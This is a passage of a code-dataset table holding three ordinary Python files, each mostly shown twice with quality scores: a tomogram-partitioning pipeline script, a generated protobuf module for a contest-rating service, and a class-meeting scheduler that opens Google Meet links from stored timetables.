code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import argparse
import sys

# CLI arguments. --pythonpath is consumed immediately so that the
# project-local imports further down can be resolved.
parser = argparse.ArgumentParser()
parser.add_argument("-config_file", "--config_file", type=str)
parser.add_argument("-pythonpath", "--pythonpath", type=str)
parser.add_argument("-fold", "--fold", type=str, default="None")
parser.add_argument("-tomo_name", "--tomo_name", type=str)
args = parser.parse_args()
pythonpath = args.pythonpath
sys.path.append(pythonpath)

# These imports require the path appended above, hence their deliberate
# placement after argument parsing instead of at the top of the file.
import os
import ast
import numpy as np
import pandas as pd
from constants.dataset_tables import DatasetTableHeader
from file_actions.readers.tomograms import load_tomogram
from paths.pipeline_dirs import testing_partition_path
from tomogram_utils.volume_actions.actions import \
    partition_raw_intersecting_mask
from constants.config import Config

config_file = args.config_file
tomo_name = args.tomo_name
# --fold arrives as a string (e.g. "None" or "0"); literal_eval converts
# it into the corresponding Python value.
fold = ast.literal_eval(args.fold)
config = Config(args.config_file)

# Sentinel file touched at the very end so snakemake can track completion.
snakemake_pattern = config.work_dir + "/testing_data/" + tomo_name + \
    "/.test_partition.{fold}.done".format(fold=str(fold))
print("tomo_name", tomo_name)
partition_output_dir, partition_path = testing_partition_path(output_dir=config.work_dir,
                                                              tomo_name=tomo_name,
                                                              fold=fold)
print("partition_path =", partition_path)
os.makedirs(partition_output_dir, exist_ok=True)
if os.path.exists(partition_path):
    # Partition was already generated on a previous run; skip the heavy work.
    print("Exiting, path exists.")
else:
    overlap = config.overlap
    box_size = config.box_size
    box_shape = (box_size, box_size, box_size)
    DTHeader = DatasetTableHeader(processing_tomo=config.processing_tomo, filtering_mask=config.region_mask)
    df = pd.read_csv(config.dataset_table, dtype={"tomo_name": str})
    df[DTHeader.tomo_name] = df[DTHeader.tomo_name].astype(str)
    tomo_df = df[df[DTHeader.tomo_name] == tomo_name]
    print(tomo_name, config.processing_tomo, tomo_df)
    path_to_raw = tomo_df.iloc[0][config.processing_tomo]
    intersecting_mask_path = tomo_df.iloc[0][config.region_mask]
    raw_dataset = load_tomogram(path_to_dataset=path_to_raw, dtype=float)
    # pandas yields NaN (a float) for a missing table cell; that means no
    # region mask is available, so an all-ones mask of the tomogram's
    # shape is used instead.
    if isinstance(intersecting_mask_path, float):
        print("No region mask file available.")
        intersecting_mask = np.ones_like(raw_dataset, dtype=np.int8)
    else:
        intersecting_mask_path = tomo_df.iloc[0][config.region_mask]
        intersecting_mask = load_tomogram(path_to_dataset=intersecting_mask_path)
    # Crop both volumes to their common minimal shape so they align.
    # NOTE(review): assumes axis order (z, y, x) — confirm with load_tomogram.
    mask_shape = intersecting_mask.shape
    dataset_shape = raw_dataset.shape
    minimum_shape = [np.min([data_dim, mask_dim]) for
                     data_dim, mask_dim in zip(dataset_shape, mask_shape)]
    minz, miny, minx = minimum_shape
    intersecting_mask = intersecting_mask[:minz, :miny, :minx]
    raw_dataset = raw_dataset[:minz, :miny, :minx]
    partition_raw_intersecting_mask(dataset=raw_dataset,
                                    mask_dataset=intersecting_mask,
                                    output_h5_file_path=partition_path,
                                    subtomo_shape=box_shape,
                                    overlap=overlap)

# For snakemake: touch the sentinel file (opened for writing, left empty).
with open(snakemake_pattern, "w") as f:
    print("Creating snakemake pattern")
# NOTE(review): this chunk is missing its leading "import argparse" line
# (lost to the dataset-row boundary above); argparse is referenced below.
import sys

# CLI arguments. --pythonpath is consumed immediately so that the
# project-local imports further down can be resolved.
parser = argparse.ArgumentParser()
parser.add_argument("-config_file", "--config_file", type=str)
parser.add_argument("-pythonpath", "--pythonpath", type=str)
parser.add_argument("-fold", "--fold", type=str, default="None")
parser.add_argument("-tomo_name", "--tomo_name", type=str)
args = parser.parse_args()
pythonpath = args.pythonpath
sys.path.append(pythonpath)

# These imports require the path appended above, hence their deliberate
# placement after argument parsing instead of at the top of the file.
import os
import ast
import numpy as np
import pandas as pd
from constants.dataset_tables import DatasetTableHeader
from file_actions.readers.tomograms import load_tomogram
from paths.pipeline_dirs import testing_partition_path
from tomogram_utils.volume_actions.actions import \
    partition_raw_intersecting_mask
from constants.config import Config

config_file = args.config_file
tomo_name = args.tomo_name
# --fold arrives as a string (e.g. "None" or "0"); literal_eval converts
# it into the corresponding Python value.
fold = ast.literal_eval(args.fold)
config = Config(args.config_file)

# Sentinel file touched at the very end so snakemake can track completion.
snakemake_pattern = config.work_dir + "/testing_data/" + tomo_name + \
    "/.test_partition.{fold}.done".format(fold=str(fold))
print("tomo_name", tomo_name)
partition_output_dir, partition_path = testing_partition_path(output_dir=config.work_dir,
                                                              tomo_name=tomo_name,
                                                              fold=fold)
print("partition_path =", partition_path)
os.makedirs(partition_output_dir, exist_ok=True)
if os.path.exists(partition_path):
    # Partition was already generated on a previous run; skip the heavy work.
    print("Exiting, path exists.")
else:
    overlap = config.overlap
    box_size = config.box_size
    box_shape = (box_size, box_size, box_size)
    DTHeader = DatasetTableHeader(processing_tomo=config.processing_tomo, filtering_mask=config.region_mask)
    df = pd.read_csv(config.dataset_table, dtype={"tomo_name": str})
    df[DTHeader.tomo_name] = df[DTHeader.tomo_name].astype(str)
    tomo_df = df[df[DTHeader.tomo_name] == tomo_name]
    print(tomo_name, config.processing_tomo, tomo_df)
    path_to_raw = tomo_df.iloc[0][config.processing_tomo]
    intersecting_mask_path = tomo_df.iloc[0][config.region_mask]
    raw_dataset = load_tomogram(path_to_dataset=path_to_raw, dtype=float)
    # pandas yields NaN (a float) for a missing table cell; that means no
    # region mask is available, so an all-ones mask of the tomogram's
    # shape is used instead.
    if isinstance(intersecting_mask_path, float):
        print("No region mask file available.")
        intersecting_mask = np.ones_like(raw_dataset, dtype=np.int8)
    else:
        intersecting_mask_path = tomo_df.iloc[0][config.region_mask]
        intersecting_mask = load_tomogram(path_to_dataset=intersecting_mask_path)
    # Crop both volumes to their common minimal shape so they align.
    # NOTE(review): assumes axis order (z, y, x) — confirm with load_tomogram.
    mask_shape = intersecting_mask.shape
    dataset_shape = raw_dataset.shape
    minimum_shape = [np.min([data_dim, mask_dim]) for
                     data_dim, mask_dim in zip(dataset_shape, mask_shape)]
    minz, miny, minx = minimum_shape
    intersecting_mask = intersecting_mask[:minz, :miny, :minx]
    raw_dataset = raw_dataset[:minz, :miny, :minx]
    partition_raw_intersecting_mask(dataset=raw_dataset,
                                    mask_dataset=intersecting_mask,
                                    output_h5_file_path=partition_path,
                                    subtomo_shape=box_shape,
                                    overlap=overlap)

# For snakemake: touch the sentinel file (opened for writing, left empty).
with open(snakemake_pattern, "w") as f:
    print("Creating snakemake pattern")
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='contest.proto',
package='',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\rcontest.proto\"\xbf\x01\n\x0b\x43ontestData\x12\x0e\n\x06handle\x18\x01 \x01(\t\x12\x13\n\x0bprofile_url\x18\x02 \x01(\t\x12\x0e\n\x06rating\x18\x03 \x01(\x05\x12\x0e\n\x06length\x18\x04 \x01(\x05\x12\"\n\x04\x64\x61ta\x18\x05 \x03(\x0b\x32\x14.ContestData.Contest\x1aG\n\x07\x43ontest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\t\x12\x11\n\ttimestamp\x18\x03 \x01(\x05\x12\x0e\n\x06rating\x18\x04 \x01(\x05\"6\n\x12\x43ontestDataRequest\x12\x10\n\x08platform\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\t2I\n\x12\x43ontestDataService\x12\x33\n\x0eGetContestData\x12\x13.ContestDataRequest\x1a\x0c.ContestDatab\x06proto3'
)
_CONTESTDATA_CONTEST = _descriptor.Descriptor(
name='Contest',
full_name='ContestData.Contest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ContestData.Contest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='url', full_name='ContestData.Contest.url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='timestamp', full_name='ContestData.Contest.timestamp', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rating', full_name='ContestData.Contest.rating', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=138,
serialized_end=209,
)
_CONTESTDATA = _descriptor.Descriptor(
name='ContestData',
full_name='ContestData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='handle', full_name='ContestData.handle', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='profile_url', full_name='ContestData.profile_url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rating', full_name='ContestData.rating', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='length', full_name='ContestData.length', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='ContestData.data', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_CONTESTDATA_CONTEST, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=18,
serialized_end=209,
)
_CONTESTDATAREQUEST = _descriptor.Descriptor(
name='ContestDataRequest',
full_name='ContestDataRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='platform', full_name='ContestDataRequest.platform', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='handle', full_name='ContestDataRequest.handle', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=211,
serialized_end=265,
)
_CONTESTDATA_CONTEST.containing_type = _CONTESTDATA
_CONTESTDATA.fields_by_name['data'].message_type = _CONTESTDATA_CONTEST
DESCRIPTOR.message_types_by_name['ContestData'] = _CONTESTDATA
DESCRIPTOR.message_types_by_name['ContestDataRequest'] = _CONTESTDATAREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ContestData = _reflection.GeneratedProtocolMessageType('ContestData', (_message.Message,), {
'Contest' : _reflection.GeneratedProtocolMessageType('Contest', (_message.Message,), {
'DESCRIPTOR' : _CONTESTDATA_CONTEST,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestData.Contest)
})
,
'DESCRIPTOR' : _CONTESTDATA,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestData)
})
_sym_db.RegisterMessage(ContestData)
_sym_db.RegisterMessage(ContestData.Contest)
ContestDataRequest = _reflection.GeneratedProtocolMessageType('ContestDataRequest', (_message.Message,), {
'DESCRIPTOR' : _CONTESTDATAREQUEST,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestDataRequest)
})
_sym_db.RegisterMessage(ContestDataRequest)
_CONTESTDATASERVICE = _descriptor.ServiceDescriptor(
name='ContestDataService',
full_name='ContestDataService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=267,
serialized_end=340,
methods=[
_descriptor.MethodDescriptor(
name='GetContestData',
full_name='ContestDataService.GetContestData',
index=0,
containing_service=None,
input_type=_CONTESTDATAREQUEST,
output_type=_CONTESTDATA,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_CONTESTDATASERVICE)
DESCRIPTOR.services_by_name['ContestDataService'] = _CONTESTDATASERVICE
# @@protoc_insertion_point(module_scope) | proto/contest_pb2.py | """Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='contest.proto',
package='',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\rcontest.proto\"\xbf\x01\n\x0b\x43ontestData\x12\x0e\n\x06handle\x18\x01 \x01(\t\x12\x13\n\x0bprofile_url\x18\x02 \x01(\t\x12\x0e\n\x06rating\x18\x03 \x01(\x05\x12\x0e\n\x06length\x18\x04 \x01(\x05\x12\"\n\x04\x64\x61ta\x18\x05 \x03(\x0b\x32\x14.ContestData.Contest\x1aG\n\x07\x43ontest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\t\x12\x11\n\ttimestamp\x18\x03 \x01(\x05\x12\x0e\n\x06rating\x18\x04 \x01(\x05\"6\n\x12\x43ontestDataRequest\x12\x10\n\x08platform\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\t2I\n\x12\x43ontestDataService\x12\x33\n\x0eGetContestData\x12\x13.ContestDataRequest\x1a\x0c.ContestDatab\x06proto3'
)
_CONTESTDATA_CONTEST = _descriptor.Descriptor(
name='Contest',
full_name='ContestData.Contest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ContestData.Contest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='url', full_name='ContestData.Contest.url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='timestamp', full_name='ContestData.Contest.timestamp', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rating', full_name='ContestData.Contest.rating', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=138,
serialized_end=209,
)
_CONTESTDATA = _descriptor.Descriptor(
name='ContestData',
full_name='ContestData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='handle', full_name='ContestData.handle', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='profile_url', full_name='ContestData.profile_url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rating', full_name='ContestData.rating', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='length', full_name='ContestData.length', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='ContestData.data', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_CONTESTDATA_CONTEST, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=18,
serialized_end=209,
)
_CONTESTDATAREQUEST = _descriptor.Descriptor(
name='ContestDataRequest',
full_name='ContestDataRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='platform', full_name='ContestDataRequest.platform', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='handle', full_name='ContestDataRequest.handle', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=211,
serialized_end=265,
)
_CONTESTDATA_CONTEST.containing_type = _CONTESTDATA
_CONTESTDATA.fields_by_name['data'].message_type = _CONTESTDATA_CONTEST
DESCRIPTOR.message_types_by_name['ContestData'] = _CONTESTDATA
DESCRIPTOR.message_types_by_name['ContestDataRequest'] = _CONTESTDATAREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ContestData = _reflection.GeneratedProtocolMessageType('ContestData', (_message.Message,), {
'Contest' : _reflection.GeneratedProtocolMessageType('Contest', (_message.Message,), {
'DESCRIPTOR' : _CONTESTDATA_CONTEST,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestData.Contest)
})
,
'DESCRIPTOR' : _CONTESTDATA,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestData)
})
_sym_db.RegisterMessage(ContestData)
_sym_db.RegisterMessage(ContestData.Contest)
ContestDataRequest = _reflection.GeneratedProtocolMessageType('ContestDataRequest', (_message.Message,), {
'DESCRIPTOR' : _CONTESTDATAREQUEST,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestDataRequest)
})
_sym_db.RegisterMessage(ContestDataRequest)
_CONTESTDATASERVICE = _descriptor.ServiceDescriptor(
name='ContestDataService',
full_name='ContestDataService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=267,
serialized_end=340,
methods=[
_descriptor.MethodDescriptor(
name='GetContestData',
full_name='ContestDataService.GetContestData',
index=0,
containing_service=None,
input_type=_CONTESTDATAREQUEST,
output_type=_CONTESTDATA,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_CONTESTDATASERVICE)
DESCRIPTOR.services_by_name['ContestDataService'] = _CONTESTDATASERVICE
# @@protoc_insertion_point(module_scope) | 0.324771 | 0.127979 |
from datetime import date
from datetime import timedelta
import datetime
import pickle
import os
from pickle import FALSE
from scripts.timetable import tt_runner
import scripts.webPageHandler as wph
import scripts.classroomaccess as ma
import scripts.calendaraccess as cac
import time
import pyfiglet
import sys
days = ['monday','tuesday','wednesday','thursday','friday','saturday','sunday']
def twelve_to_24(twelvetime):
    """Convert a 12-hour time string ("H:MM AM") to "H:MM:00" 24-hour form.

    Midnight ("12:xx AM") becomes "00:xx:00" and noon stays "12:xx:00".
    Note that AM hours are NOT zero-padded (e.g. "9:45 AM" -> "9:45:00"),
    matching the original output format.
    """
    parts = twelvetime.split(' ')
    clock = parts[0]
    meridiem = parts[1]
    hour, minute = clock.split(':')[0], clock.split(':')[1]
    if meridiem == 'AM':
        if hour == '12':
            hour = '00'
    else:
        numeric_hour = int(hour)
        if numeric_hour != 12:
            numeric_hour += 12
        hour = str(numeric_hour)
    return hour + ':' + minute + ':' + '00'
def compare_times(timeone, timetwo):
    """Compare two 12-hour time strings (e.g. "9:45 AM").

    Returns 0 if *timeone* is the later clock time, 1 otherwise.  Ties
    (equal hour and minute) return 1, preserving the original behaviour
    so a class starting exactly now still counts as upcoming.

    Bug fix: hours are now compared numerically.  The previous version
    compared them as strings, and since twelve_to_24 does not zero-pad
    morning hours, '9' > '13' lexicographically — i.e. 9:45 AM was
    wrongly treated as later than 1:30 PM.
    """
    def _minutes_since_midnight(timestr):
        # Parse "H:MM AM|PM" into minutes since midnight (24-hour clock).
        parts = timestr.split(' ')
        clock, meridiem = parts[0], parts[1]
        hour = int(clock.split(':')[0]) % 12  # 12 AM -> 0; 12 PM -> 0 + 12 below
        if meridiem == 'PM':
            hour += 12
        return hour * 60 + int(clock.split(':')[1])

    if _minutes_since_midnight(timeone) > _minutes_since_midnight(timetwo):
        return 0
    return 1
def get_next_class(ctime, todlist, x, tomlist, y, dayafterlist, z):
    """Return [class_entry, day_offset] for the first class after *ctime*.

    day_offset is 0 for today, 1 for tomorrow, 2 for the day after.
    The x/y/z day-name arguments are kept for interface compatibility
    but are not used.
    """
    for entry in todlist:
        # Each entry is (name, start_time, ...); take the first one that
        # starts later than the current time.
        if compare_times(ctime, entry[1]) == 1:
            return [entry, 0]
    if tomlist:
        return [tomlist[0], 1]
    return [dayafterlist[0], 2]
def calculate_seconds(cxtime, nxclass):
    """Return the number of seconds from *cxtime* to the next class.

    *nxclass* is the [class_entry, day_offset] pair produced by
    get_next_class; every full day of offset adds 86400 seconds.
    """
    whole_days = {0: 0, 1: 86400}.get(nxclass[1], 172800)
    fmt = '%H:%M:%S'
    class_start = datetime.datetime.strptime(twelve_to_24(nxclass[0][1]), fmt)
    now = datetime.datetime.strptime(twelve_to_24(cxtime), fmt)
    # The clock delta may be negative when the class is on a later day;
    # the day offset added above compensates.
    return whole_days + int((class_start - now).total_seconds())
def mainrunner():
    """Main loop: wait for the next scheduled class and open its meet link.

    Runs forever; each iteration reloads the pickled timetables for
    today, tomorrow and the day after, sleeps until shortly before the
    next class, resolves the meeting link and opens it in the browser.
    """
    awesome_disp = pyfiglet.figlet_format('AUTOMEET')
    while(1):
        os.system('cls' if os.name == 'nt' else 'clear')
        print(awesome_disp)
        creds = tt_runner()
        today = days[datetime.date.today().weekday()] #days gets the value(string) of the current day
        tom = datetime.date.today() + datetime.timedelta(days=1)
        datom = datetime.date.today() + datetime.timedelta(days=2)
        tomorrow = days[tom.weekday()]
        dayaftertom = days[datom.weekday()]
        # Timetables are pickled per-day under ./timetables/<day>.pkl.
        # NOTE(review): Windows-style '\\' separators — confirm this only
        # runs on Windows, or switch to os.path.join.
        file_handler = open(os.getcwd()+'\\timetables\\'+today+'.pkl',"rb")
        today_classes_list = pickle.load(file_handler)
        file_handler.close()
        file_handler = open(os.getcwd()+'\\timetables\\'+tomorrow+'.pkl',"rb")
        tomorrow_classes_list = pickle.load(file_handler)
        file_handler.close()
        file_handler = open(os.getcwd()+'\\timetables\\'+dayaftertom+'.pkl',"rb")
        dayafter_classes_list = pickle.load(file_handler)
        file_handler.close()
        current_time = datetime.datetime.now().time().strftime("%I:%M %p")
        next_class = get_next_class(current_time,today_classes_list,today,tomorrow_classes_list,tomorrow,dayafter_classes_list,dayaftertom)
        remaining_time = calculate_seconds(current_time,next_class)
        print('Next Class',next_class[0][0], 'is at', next_class[0][1], 'and starts in', int(remaining_time)//60,'minutes')
        # Count down until 5 minutes (300 s) before the class starts.
        for i in range(remaining_time-300,0,-1):
            sys.stdout.write(' '+str(i)+' seconds remaining' + '\r')
            sys.stdout.flush()
            time.sleep(1) #sleeps the program until 5 min before the upcoming class
        class_link = cac.getthelink(next_class,creds) #calendaraccess returns the google meet link, or None
        if class_link == None:
            # No calendar entry yet: wait another 8 minutes, then fall
            # back to fetching the link from Google Classroom.
            for i in range(480,0,-1):
                sys.stdout.write(' '+str(i)+' seconds remaining' + '\r')
                sys.stdout.flush()
                time.sleep(1)
            class_link = ma.get_the_link(next_class,creds)
        print('\n\n','Class Link is ',class_link)
        wph.web_page_opener(class_link) #webPageHandler opens the link in the current browser profile and closes it once the class is over
from datetime import date
from datetime import timedelta
import datetime
import pickle
import os
from pickle import FALSE
from scripts.timetable import tt_runner
import scripts.webPageHandler as wph
import scripts.classroomaccess as ma
import scripts.calendaraccess as cac
import time
import pyfiglet
import sys
days = ['monday','tuesday','wednesday','thursday','friday','saturday','sunday']
def twelve_to_24(twelvetime):
    """Convert a 12-hour time string ("H:MM AM") to "H:MM:00" 24-hour form.

    Midnight ("12:xx AM") becomes "00:xx:00" and noon stays "12:xx:00".
    Note that AM hours are NOT zero-padded (e.g. "9:45 AM" -> "9:45:00"),
    matching the original output format.
    """
    parts = twelvetime.split(' ')
    clock = parts[0]
    meridiem = parts[1]
    hour, minute = clock.split(':')[0], clock.split(':')[1]
    if meridiem == 'AM':
        if hour == '12':
            hour = '00'
    else:
        numeric_hour = int(hour)
        if numeric_hour != 12:
            numeric_hour += 12
        hour = str(numeric_hour)
    return hour + ':' + minute + ':' + '00'
def compare_times(timeone, timetwo):
    """Compare two 12-hour time strings (e.g. "9:45 AM").

    Returns 0 if *timeone* is the later clock time, 1 otherwise.  Ties
    (equal hour and minute) return 1, preserving the original behaviour
    so a class starting exactly now still counts as upcoming.

    Bug fix: hours are now compared numerically.  The previous version
    compared them as strings, and since twelve_to_24 does not zero-pad
    morning hours, '9' > '13' lexicographically — i.e. 9:45 AM was
    wrongly treated as later than 1:30 PM.
    """
    def _minutes_since_midnight(timestr):
        # Parse "H:MM AM|PM" into minutes since midnight (24-hour clock).
        parts = timestr.split(' ')
        clock, meridiem = parts[0], parts[1]
        hour = int(clock.split(':')[0]) % 12  # 12 AM -> 0; 12 PM -> 0 + 12 below
        if meridiem == 'PM':
            hour += 12
        return hour * 60 + int(clock.split(':')[1])

    if _minutes_since_midnight(timeone) > _minutes_since_midnight(timetwo):
        return 0
    return 1
def get_next_class(ctime, todlist, x, tomlist, y, dayafterlist, z):
    """Return [class_entry, day_offset] for the first class after *ctime*.

    day_offset is 0 for today, 1 for tomorrow, 2 for the day after.
    The x/y/z day-name arguments are kept for interface compatibility
    but are not used.
    """
    for entry in todlist:
        # Each entry is (name, start_time, ...); take the first one that
        # starts later than the current time.
        if compare_times(ctime, entry[1]) == 1:
            return [entry, 0]
    if tomlist:
        return [tomlist[0], 1]
    return [dayafterlist[0], 2]
def calculate_seconds(cxtime, nxclass):
    """Return the number of seconds from *cxtime* to the next class.

    *nxclass* is the [class_entry, day_offset] pair produced by
